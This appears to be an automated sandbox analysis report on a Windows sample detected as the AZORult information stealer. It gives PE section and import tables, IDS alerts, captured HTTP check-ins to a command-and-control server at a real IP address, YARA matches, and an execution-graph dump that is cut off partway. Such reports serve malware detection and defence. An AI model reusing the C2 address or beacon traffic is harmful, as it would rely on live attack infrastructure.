            .rdata0x3c0000x480e0x4a00765060234479e16b0bf251ce626a18e4False0.20935388513513514data3.1343880087873326IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x410000xabf780x20009001cb4e291326337115450b32aeb83fFalse0.095947265625data1.2181065100922521IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .idata0xed0000x1cf80x120087b293a4a94207a8a00a1db59445fbdeFalse0.2710503472222222data3.725112381818601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0xef0000xf88c0xfa0011eec42d63539d0445a95f42bc3f22c6False0.44328125data4.529337467503568IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xff0000x19190x1a00dffda6984192b03d366aea5e8c7f105eFalse0.44290865384615385data4.283332831369549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            MAZIVUHONIRELI0xfaeb00x1098ASCII text, with very long lines (4248), with no line terminators0.5988700564971752
            NEJOWUCOXENASIYONEHOS0xfa0b00x4baASCII text, with very long lines (1210), with no line terminators0.6231404958677685
            VAVANOR0xfa5700x93cASCII text, with very long lines (2364), with no line terminators0.6070219966159053
            RT_ICON0xef6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5749097472924187
            RT_ICON0xeff280x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5867052023121387
            RT_ICON0xf04900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.5360995850622406
            RT_ICON0xf2a380x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.6885245901639344
            RT_ICON0xf33c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.8421985815602837
            RT_ICON0xf38780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.4565565031982942
            RT_ICON0xf47200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5094765342960289
            RT_ICON0xf4fc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.6641705069124424
            RT_ICON0xf56900x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.4342485549132948
            RT_ICON0xf5bf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.39450207468879667
            RT_ICON0xf81a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.5525328330206379
            RT_ICON0xf92480x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.5668032786885245
            RT_ICON0xf9bd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.650709219858156
            RT_ACCELERATOR0xfbf480x18data1.3333333333333333
            RT_GROUP_ICON0xf38280x4cdata0.8289473684210527
            RT_GROUP_ICON0xfa0380x76data0.6779661016949152
            DLLImport
            KERNEL32.dllGetFileTime, FindClose, GlobalAlloc, VirtualProtect, GetModuleHandleA, GetSystemDirectoryW, GetCommandLineA, SetEnvironmentVariableW, HeapUnlock, ReplaceFileA, EnumTimeFormatsW, GetVolumePathNamesForVolumeNameA, ReadConsoleA, WriteProfileStringA, LoadLibraryW, IsProcessorFeaturePresent, GetTickCount, Sleep, MoveFileWithProgressA, WaitForMultipleObjects, WaitForSingleObject, FormatMessageA, GetStringTypeExA, EnumSystemLocalesA, GetLocaleInfoA, HeapAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetProcAddress, GetModuleHandleW, ExitProcess, DecodePointer, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, HeapDestroy, EncodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, GetCurrentThread, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, GetLocaleInfoW, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapFree, RtlUnwind, HeapSize, SetStdHandle, WriteConsoleW, MultiByteToWideChar, LCMapStringW, GetStringTypeW, HeapReAlloc, CreateFileW, CloseHandle, FlushFileBuffers, GetUserDefaultLCID, IsValidLocale
            MSIMG32.dllGradientFill
            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
            2025-01-11T12:02:01.040672+01002029467ET MALWARE Win32/AZORult V3.3 Client Checkin M141192.168.2.54970451.15.142.23580TCP
            2025-01-11T12:02:01.040672+01002810276ETPRO MALWARE AZORult CnC Beacon M11192.168.2.54970451.15.142.23580TCP
            TimestampSource PortDest PortSource IPDest IP
            Jan 11, 2025 12:02:00.289505959 CET4970480192.168.2.551.15.142.235
            Jan 11, 2025 12:02:00.294672012 CET804970451.15.142.235192.168.2.5
            Jan 11, 2025 12:02:00.294775009 CET4970480192.168.2.551.15.142.235
            Jan 11, 2025 12:02:00.294903040 CET4970480192.168.2.551.15.142.235
            Jan 11, 2025 12:02:00.299715996 CET804970451.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.040554047 CET804970451.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.040571928 CET804970451.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.040672064 CET4970480192.168.2.551.15.142.235
            Jan 11, 2025 12:02:01.043647051 CET4970480192.168.2.551.15.142.235
            Jan 11, 2025 12:02:01.048424959 CET804970451.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.050987959 CET4970580192.168.2.551.15.142.235
            Jan 11, 2025 12:02:01.055775881 CET804970551.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.055871964 CET4970580192.168.2.551.15.142.235
            Jan 11, 2025 12:02:01.055911064 CET4970580192.168.2.551.15.142.235
            Jan 11, 2025 12:02:01.060656071 CET804970551.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.828800917 CET804970551.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.828847885 CET804970551.15.142.235192.168.2.5
            Jan 11, 2025 12:02:01.828937054 CET4970580192.168.2.551.15.142.235
            Jan 11, 2025 12:02:01.829020023 CET4970580192.168.2.551.15.142.235
            Jan 11, 2025 12:02:01.833859921 CET804970551.15.142.235192.168.2.5
            • 51.15.142.235
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.54970451.15.142.235806508C:\Users\user\Desktop\12E56QE1Fc.exe
            TimestampBytes transferredDirectionData
            Jan 11, 2025 12:02:00.294903040 CET306OUTPOST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            Host: 51.15.142.235
            Content-Length: 107
            Cache-Control: no-cache
            Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 63 ed 47 17 8b 30 65 ec 26 66 9d 26 66 9f 26 67 ea 26 66 9b 45 70 9d 31 70 9d 37 70 9d 31 11 8b 30 6d 8b 30 62
            Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
            Jan 11, 2025 12:02:01.040554047 CET456INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Sat, 11 Jan 2025 11:02:00 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Set-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:00 GMT; Max-Age=7200
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            X-Redirect-By: WordPress
            Location: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/
            Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.54970551.15.142.235806508C:\Users\user\Desktop\12E56QE1Fc.exe
            TimestampBytes transferredDirectionData
            Jan 11, 2025 12:02:01.055911064 CET368OUTPOST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.0
            Host: 51.15.142.235
            Connection: close
            User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            Content-Length: 107
            Data Raw: 00 00 00 45 14 ef bf bd 30 62 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 46 70 ef bf bd 35 70 ef bf bd 47 70 ef bf bd 3a 70 ef bf bd 37 70 ef bf bd 32 70 ef bf bd 37 70 ef bf bd 3a 70 ef bf bd 33 70 ef bf bd 34 14 ef bf bd 31 11 ef bf bd 30 62 ef bf bd 30 60 ef bf bd 30 63 ef bf bd 30 63 ef bf bd 26 66 ef bf bd 45 17 ef bf bd 31 11 ef bf bd 30 63 ef bf bd 47 17 ef bf bd 30 65 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 26 67 ef bf bd 26 66 ef bf bd 45 70 ef bf bd 31 70 ef bf bd 37 70 ef bf bd 31 11 ef bf bd 30 6d ef bf bd 30 62
            Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
            Jan 11, 2025 12:02:01.828800917 CET423INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Sat, 11 Jan 2025 11:02:01 GMT
            Content-Type: text/html; charset=UTF-8
            Connection: close
            Set-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:01 GMT; Max-Age=7200
            Expires: Wed, 11 Jan 1984 05:00:00 GMT
            Cache-Control: no-cache, must-revalidate, max-age=0
            X-Redirect-By: WordPress
            Location: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Target ID:0
            Start time:06:01:59
            Start date:11/01/2025
            Path:C:\Users\user\Desktop\12E56QE1Fc.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\12E56QE1Fc.exe"
            Imagebase:0x400000
            File size:344'576 bytes
            MD5 hash:289C12D43AA35C8C8BF22BACE3358CDE
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
            • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
            • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
            • Rule: Azorult_1, Description: Azorult Payload, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: kevoreilly
            • Rule: Azorult, Description: detect Azorult in memory, Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:6%
              Dynamic/Decrypted Code Coverage:4.3%
              Signature Coverage:18.8%
              Total number of Nodes:797
              Total number of Limit Nodes:16
              execution_graph 26261 425db0 26299 4289e0 26261->26299 26263 425dbc GetStartupInfoW 26264 425dd0 HeapSetInformation 26263->26264 26266 425ddb 26263->26266 26264->26266 26300 426657 HeapCreate 26266->26300 26267 425e29 26268 425e34 26267->26268 26397 425d40 38 API calls 3 library calls 26267->26397 26301 428860 GetModuleHandleW 26268->26301 26271 425e3a 26272 425e45 __RTC_Initialize 26271->26272 26398 425d40 38 API calls 3 library calls 26271->26398 26320 4281cc GetStartupInfoW 26272->26320 26276 425e5f GetCommandLineW 26333 428174 GetEnvironmentStringsW 26276->26333 26279 425e5e 26279->26276 26280 425e6f 26340 4280c6 GetModuleFileNameW 26280->26340 26285 425e84 26346 427e85 26285->26346 26286 425e8a 26287 425e95 26286->26287 26401 42640a 38 API calls 4 library calls 26286->26401 26360 4261e9 26287->26360 26290 425e9d 26292 425ea8 __wwincmdln 26290->26292 26402 42640a 38 API calls 4 library calls 26290->26402 26366 423704 26292->26366 26293 425eca 26294 425ed8 26293->26294 26403 4263c0 38 API calls _doexit 26293->26403 26404 4263ec 38 API calls _doexit 26294->26404 26297 425edd __commit 26299->26263 26300->26267 26302 428874 26301->26302 26305 42887d TlsAlloc 26301->26305 26405 428533 40 API calls _free 26302->26405 26304 428879 26304->26271 26307 4289d6 26305->26307 26308 428915 26305->26308 26307->26271 26308->26307 26406 426115 RtlEncodePointer RtlEncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 26308->26406 26310 42892b 26407 428c9a InitializeCriticalSectionAndSpinCount 26310->26407 26312 4289d1 26415 428533 40 API calls _free 26312->26415 26314 42896a 26314->26312 26408 42b433 26314->26408 26317 4289b6 26414 428570 38 API calls 4 library calls 26317->26414 26319 4289be GetCurrentThreadId 26319->26307 26321 42b433 __calloc_crt 38 API calls 26320->26321 26322 4281ea 26321->26322 26323 42835f 26322->26323 26326 42b433 __calloc_crt 38 API calls 26322->26326 26327 425e53 26322->26327 26329 4282df 26322->26329 26324 428395 GetStdHandle 26323->26324 26325 4283f9 SetHandleCount 26323->26325 26328 4283a7 GetFileType 26323->26328 26332 4283cd InitializeCriticalSectionAndSpinCount 26323->26332 26324->26323 26325->26327 26326->26322 26327->26276 26399 42640a 38 API calls 4 library calls 26327->26399 26328->26323 26329->26323 26330 428316 InitializeCriticalSectionAndSpinCount 26329->26330 26331 42830b GetFileType 26329->26331 26330->26327 26330->26329 26331->26329 26331->26330 26332->26323 26332->26327 26334 428185 26333->26334 26335 428189 26333->26335 26334->26280 26427 42b3ee 38 API calls _malloc 26335->26427 26338 4281b2 FreeEnvironmentStringsW 26338->26280 26339 4281ab _signal 26339->26338 26342 4280fb _wparse_cmdline 26340->26342 26341 425e79 26341->26285 26400 42640a 38 API calls 4 library calls 26341->26400 26342->26341 26343 428138 26342->26343 26428 42b3ee 38 API calls _malloc 26343->26428 26345 42813e _wparse_cmdline 26345->26341 26347 427e9d _wcslen 26346->26347 26351 427e95 26346->26351 26348 42b433 __calloc_crt 38 API calls 26347->26348 26353 427ec1 _wcslen 26348->26353 26349 427f17 26430 42b379 38 API calls 2 library calls 26349->26430 26351->26286 26352 42b433 __calloc_crt 38 API calls 26352->26353 26353->26349 26353->26351 26353->26352 26354 427f3d 26353->26354 26357 427f54 26353->26357 26429 429ca4 38 API calls __fclose_nolock 26353->26429 26431 42b379 38 API calls 2 library calls 26354->26431 26432 42772e 10 API calls __call_reportfault 26357->26432 26359 427f60 26359->26286 26362 4261f7 __IsNonwritableInCurrentImage 26360->26362 26433 4297db 26362->26433 26363 426215 __initterm_e 26365 426236 __IsNonwritableInCurrentImage 26363->26365 26436 4297c4 44 API calls __cinit 26363->26436 26365->26290 26367 423734 26366->26367 26368 42371a 26366->26368 26371 4238cf 9 API calls 26367->26371 26372 42397d 26367->26372 26396 4252b5 26367->26396 26502 425b7e 63 API calls 3 library calls 26368->26502 26370 423729 26503 425b7e 63 API calls 3 library calls 26370->26503 26374 42396a 26371->26374 26375 42399f GetTickCount 26372->26375 26376 4239fd GlobalAlloc 26372->26376 26504 425aea 38 API calls 5 library calls 26374->26504 26378 4239b1 IsProcessorFeaturePresent 26375->26378 26382 42397b 26375->26382 26385 423a1f 26376->26385 26378->26382 26379 423971 26505 425a6b 38 API calls 2 library calls 26379->26505 26382->26372 26383 4239f9 26382->26383 26383->26376 26384 423bc2 26437 421ac1 VirtualProtect 26384->26437 26385->26384 26386 423bb0 LoadLibraryW 26385->26386 26386->26385 26387 423c30 26387->26396 26438 4033f0 26387->26438 26448 4033ec 26387->26448 26458 7850c0 26387->26458 26462 784a90 26387->26462 26478 4033f4 26387->26478 26488 41a684 26387->26488 26495 784ffd 26387->26495 26396->26293 26397->26268 26398->26272 26399->26279 26400->26285 26401->26287 26402->26292 26403->26294 26404->26297 26405->26304 26406->26310 26407->26314 26410 42b43c 26408->26410 26411 428999 26410->26411 26412 42b45a Sleep 26410->26412 26416 42603e 26410->26416 26411->26312 26411->26317 26413 42b46f 26412->26413 26413->26410 26413->26411 26414->26319 26415->26307 26417 42604a 26416->26417 26424 426065 26416->26424 26418 426056 26417->26418 26417->26424 26425 425f69 38 API calls __getptd_noexit 26418->26425 26420 426078 RtlAllocateHeap 26423 42609f 26420->26423 26420->26424 26421 42605b 26421->26410 26423->26410 26424->26420 26424->26423 26426 4266eb RtlDecodePointer 26424->26426 26425->26421 26426->26424 26427->26339 26428->26345 26429->26353 26430->26351 26431->26351 26432->26359 26434 4297e1 RtlEncodePointer 26433->26434 26434->26434 26435 4297fb 26434->26435 26435->26363 26436->26365 26437->26387 26439 40340d 26438->26439 26440 40342c 26439->26440 26442 40343d 26439->26442 26506 403368 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26440->26506 26444 403478 FreeLibrary 26442->26444 26446 40347e 26442->26446 26443 403436 26443->26442 26444->26446 26445 4034b3 26446->26445 26447 4034ab ExitProcess 26446->26447 26450 4033f0 26448->26450 26449 40342c 26507 403368 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26449->26507 26450->26449 26453 40343d 26450->26453 26452 403436 26452->26453 26454 403478 FreeLibrary 26453->26454 26456 40347e 26453->26456 26454->26456 26455 4034b3 26456->26455 26457 4034ab ExitProcess 26456->26457 26459 785092 26458->26459 26459->26458 26460 7852c2 LoadLibraryA 26459->26460 26461 78531b 26460->26461 26463 784a9d 26462->26463 26508 78584c SetErrorMode SetErrorMode 26463->26508 26467 784c8c VirtualAlloc 26468 784cb9 26467->26468 26469 784d22 VirtualProtect 26468->26469 26471 784d5f 26469->26471 26470 784e8d VirtualFree 26476 785048 26470->26476 26477 784f12 26470->26477 26471->26470 26472 784f37 LoadLibraryA 26472->26477 26473 785067 26474 7852c2 LoadLibraryA 26475 78531b 26474->26475 26476->26473 26476->26474 26477->26472 26477->26476 26479 40340d 26478->26479 26480 40342c 26479->26480 26483 40343d 26479->26483 26515 403368 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26480->26515 26482 403436 26482->26483 26484 403478 FreeLibrary 26483->26484 26486 40347e 26483->26486 26484->26486 26485 4034b3 26486->26485 26487 4034ab ExitProcess 26486->26487 26516 404d00 GetModuleHandleA 26488->26516 26490 41a694 26518 419108 26490->26518 26493 4033f4 7 API calls 26494 41a6a3 26493->26494 26496 784f27 26495->26496 26497 784f37 LoadLibraryA 26496->26497 26501 785048 26496->26501 26497->26496 26498 785067 26499 7852c2 LoadLibraryA 26500 78531b 26499->26500 26501->26498 26501->26499 26502->26370 26503->26367 26504->26379 26505->26382 26506->26443 26507->26452 26509 784c77 26508->26509 26510 7857e4 26509->26510 26511 785801 26510->26511 26512 78580a 26511->26512 26513 78580f GetPEB 26511->26513 26512->26467 26514 785830 26513->26514 26514->26467 26515->26482 26517 404d33 26516->26517 26517->26490 26519 419110 26518->26519 26782 4034e4 26519->26782 26525 419155 26791 407d24 26525->26791 26531 41917e 26532 419189 CreateMutexA 26531->26532 26533 4191a3 26532->26533 26534 419f30 26533->26534 26536 4034e4 7 API calls 26533->26536 26535 4034e4 7 API calls 26534->26535 26537 419f48 26535->26537 26545 4191b6 26536->26545 27022 403b98 26537->27022 26540 4191e4 26859 418f9c 26540->26859 26541 4034e4 7 API calls 26544 419f63 26541->26544 26547 403b98 SysFreeString 26544->26547 26545->26540 26548 403798 7 API calls 26545->26548 26987 4036cc 7 API calls 26545->26987 26551 419f73 26547->26551 26548->26545 26549 406c4c 19 API calls 26550 4191f7 26549->26550 26870 406810 26550->26870 27026 403508 26551->27026 26558 419219 26905 4176d8 26558->26905 26561 403508 7 API calls 26563 419f9e 26561->26563 26565 403b80 SysFreeString 26563->26565 26566 419fa9 26565->26566 26568 403508 7 API calls 26566->26568 26570 419fb9 26568->26570 26569 4176d8 7 API calls 26574 41924c 26569->26574 26571 403b80 SysFreeString 26570->26571 26572 419fc4 26571->26572 26573 403508 7 API calls 26572->26573 26575 419fd4 26573->26575 26574->26534 26577 419272 26574->26577 26576 403b80 SysFreeString 26575->26576 26578 419fdf 26576->26578 26988 407428 7 API calls 26577->26988 26580 403508 7 API calls 26578->26580 26582 419fef 26580->26582 26581 41928b 26989 406984 7 API calls 26581->26989 26584 403b80 SysFreeString 26582->26584 26586 419ffa 26584->26586 26585 419299 26990 407428 7 API calls 26585->26990 26588 403508 7 API calls 26586->26588 26590 41a00a 26588->26590 26589 4192b2 26991 406ae4 7 API calls 26589->26991 26592 403b80 SysFreeString 26590->26592 26593 41a015 26592->26593 26595 403508 7 API calls 26593->26595 26594 4192c0 26992 40795c 12 API calls 26594->26992 26597 41a025 26595->26597 26599 403b80 SysFreeString 26597->26599 26598 4192d0 26993 407428 7 API calls 26598->26993 26601 41a030 26599->26601 26603 403508 7 API calls 26601->26603 26602 4192e9 26994 406984 7 API calls 26602->26994 26605 41a040 26603->26605 26607 403b80 SysFreeString 26605->26607 26606 4192fa 26995 4080c4 12 API calls 26606->26995 26610 41a04b 26607->26610 26609 419305 26996 408328 42 API calls 26609->26996 26612 403508 7 API calls 26610->26612 26613 41a05b 26612->26613 26614 403b98 SysFreeString 26613->26614 26615 41a06b 26614->26615 26616 4034e4 7 API calls 26615->26616 26617 41a076 26616->26617 26619 403b98 SysFreeString 26617->26619 26618 419909 27012 417290 56 API calls 26618->27012 26620 41a086 26619->26620 26622 4034e4 7 API calls 26620->26622 26624 41a091 26622->26624 26623 41991c 27013 403850 26623->27013 26626 403b98 SysFreeString 26624->26626 26628 41a0a1 26626->26628 26630 4034e4 7 API calls 26628->26630 26632 41a0ac 26630->26632 26637 403b98 SysFreeString 26632->26637 26634 40795c 12 API calls 26736 41930d 26634->26736 26641 41a0bc 26637->26641 26639 403850 7 API calls 26639->26736 26647 4034e4 7 API calls 26641->26647 26643 40357c 7 API calls 26643->26736 26650 41a0c7 26647->26650 26653 403b98 SysFreeString 26650->26653 26656 41a0d7 26653->26656 26662 403508 7 API calls 26656->26662 26659 419451 GetSystemMetrics GetSystemMetrics 27007 4178b4 24 API calls 26659->27007 26661 418688 53 API calls 26661->26736 26664 41a0e7 26662->26664 27033 404224 9 API calls 26664->27033 26667 40dce8 8 API calls 26667->26736 26669 41a0fa 26670 403508 7 API calls 26669->26670 26673 41a107 26670->26673 26671 407428 7 API calls 26671->26736 26672 407048 9 API calls 26672->26736 26675 4034e4 7 API calls 26673->26675 26677 41a10f 26675->26677 26679 4034e4 7 API calls 26677->26679 26682 41a117 26679->26682 26683 403508 7 API calls 26682->26683 26684 41a124 26683->26684 26686 403508 7 API calls 26684->26686 26688 41a131 26686->26688 26690 4034e4 7 API calls 26688->26690 26692 41a139 26690->26692 26692->26493 26693 4037dc 7 API calls 26693->26736 26699 414408 33 API calls 26699->26736 26701 4070bc 8 API calls 26701->26736 26705 4034e4 7 API calls 26705->26736 26736->26534 26736->26618 26736->26634 26736->26639 26736->26643 26736->26659 26736->26661 26736->26667 26736->26671 26736->26672 26736->26693 26736->26699 26736->26701 26736->26705 26997 40d7f0 40 API calls 26736->26997 26998 4053d8 7 API calls 26736->26998 26999 414028 45 API calls 26736->26999 27000 408120 7 API calls 26736->27000 27001 405528 7 API calls 26736->27001 27002 414098 35 API calls 26736->27002 27003 415ea8 35 API calls 26736->27003 27004 4050c8 7 API calls 26736->27004 27005 414cb8 20 API calls 26736->27005 27006 414f40 25 API calls 26736->27006 27008 406fdc SysFreeString SysFreeString SysReAllocStringLen SysAllocStringLen 26736->27008 27009 403be8 9 API calls 26736->27009 27010 403d58 SysAllocStringLen SysAllocStringLen SysFreeString 26736->27010 27011 40781c 8 API calls 26736->27011 26783 403505 26782->26783 26784 4034ea 26782->26784 26786 40357c 26783->26786 26784->26783 27034 402550 7 API calls 26784->27034 26788 403580 26786->26788 26787 4035a4 26790 40561c 63 API calls 26787->26790 26788->26787 27035 402550 7 API calls 26788->27035 26790->26525 27036 403538 26791->27036 26795 407d3d 26796 407d4d 26795->26796 26797 403538 7 API calls 26795->26797 26798 407b78 FreeSid 26796->26798 26797->26796 26799 407d57 26798->26799 26800 407d67 26799->26800 26801 403538 7 API calls 26799->26801 26802 407b78 FreeSid 26800->26802 26801->26800 26803 407d71 26802->26803 26804 407d81 26803->26804 26805 403538 7 API calls 26803->26805 27045 407c58 26804->27045 26805->26804 26807 407d86 26808 407d96 26807->26808 26809 403538 7 API calls 26807->26809 26810 406c4c 26808->26810 26809->26808 26811 406c54 26810->26811 26811->26811 26812 406c76 26811->26812 26813 406c88 26811->26813 26815 403538 7 API calls 26812->26815 27058 406e70 26813->27058 26816 406c83 26815->26816 26818 403508 7 API calls 26816->26818 26817 406c90 27063 406bb4 26817->27063 26820 406d78 26818->26820 26822 403b98 SysFreeString 26820->26822 26821 406ca3 27066 4065cc GetUserNameW 26821->27066 26823 406d85 26822->26823 26824 403508 7 API calls 26823->26824 26826 406d92 26824->26826 26845 403798 26826->26845 26827 406cb6 27072 406610 SysFreeString SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 26827->27072 26829 406cc9 27073 406258 7 API calls 26829->27073 26831 406cdf 27074 406258 7 API calls 26831->27074 26833 406cf2 27075 406258 7 API calls 26833->27075 26835 406d05 27076 406258 7 API calls 26835->27076 26837 406d18 26838 403850 7 API calls 26837->26838 26839 406d39 26838->26839 27077 406258 7 API calls 26839->27077 26841 406d44 26842 403850 7 API calls 26841->26842 26843 406d54 26842->26843 26844 403538 7 API calls 26843->26844 26844->26816 26846 4037db 26845->26846 26847 40379c 26845->26847 26846->26531 26848 4037a6 26847->26848 26849 403538 26847->26849 26850 4037d0 26848->26850 26851 4037b9 26848->26851 26855 4035a8 7 API calls 26849->26855 26856 40354c 26849->26856 27120 403ac0 7 API calls 26850->27120 27119 403ac0 7 API calls 26851->27119 26853 40357a 26853->26531 26855->26856 26856->26853 27118 402550 7 API calls 26856->27118 26858 4037be 26858->26531 26860 418fb5 26859->26860 26861 4034e4 7 API calls 26860->26861 26868 418fd0 26861->26868 26862 4190d9 26863 4034e4 7 API calls 26862->26863 26864 4190ee 26863->26864 26865 4034e4 7 API calls 26864->26865 26866 4190f6 26865->26866 26866->26549 26868->26862 26869 403798 7 API calls 26868->26869 27121 4036cc 7 API calls 26868->27121 26869->26868 26871 406829 26870->26871 26872 4034e4 7 API calls 26871->26872 26877 40683e 26872->26877 26873 4068ae 26874 403508 7 API calls 26873->26874 26875 4068c8 26874->26875 26879 4034e4 7 API calls 26875->26879 26877->26873 26880 403798 7 API calls 26877->26880 26882 403850 7 API calls 26877->26882 27122 4036cc 7 API calls 26877->27122 27123 4067e8 7 API calls 26877->27123 26881 4068d0 26879->26881 26880->26877 26883 4037dc 26881->26883 26882->26877 26884 4037e0 26883->26884 26892 403798 26883->26892 26885 403538 26884->26885 26887 4037f0 26884->26887 26888 4037fe 26884->26888 26884->26892 26889 4035a8 7 API calls 26885->26889 26890 40354c 26885->26890 26886 40357a 26886->26558 26893 403538 7 API calls 26887->26893 26894 4035a8 7 API calls 26888->26894 26889->26890 26890->26886 27124 402550 7 API calls 26890->27124 26891 4037db 26891->26558 26892->26885 26892->26891 26895 4037a6 26892->26895 26893->26892 26901 403811 26894->26901 26897 4037d0 26895->26897 26898 4037b9 26895->26898 27126 403ac0 7 API calls 26897->27126 27125 403ac0 7 API calls 26898->27125 26902 403538 7 API calls 26901->26902 26904 40383d 26902->26904 26903 4037be 26903->26558 26904->26558 26909 4176f1 26905->26909 26906 417759 26908 4034e4 7 API calls 26906->26908 26910 41776e 26908->26910 26909->26906 27127 4039e8 26909->27127 26911 418688 26910->26911 26912 418691 26911->26912 26913 4186e7 26912->26913 26915 40357c 7 API calls 26912->26915 26914 4034e4 7 API calls 26913->26914 26916 4186ef 26914->26916 26915->26913 26917 40357c 7 API calls 26916->26917 26918 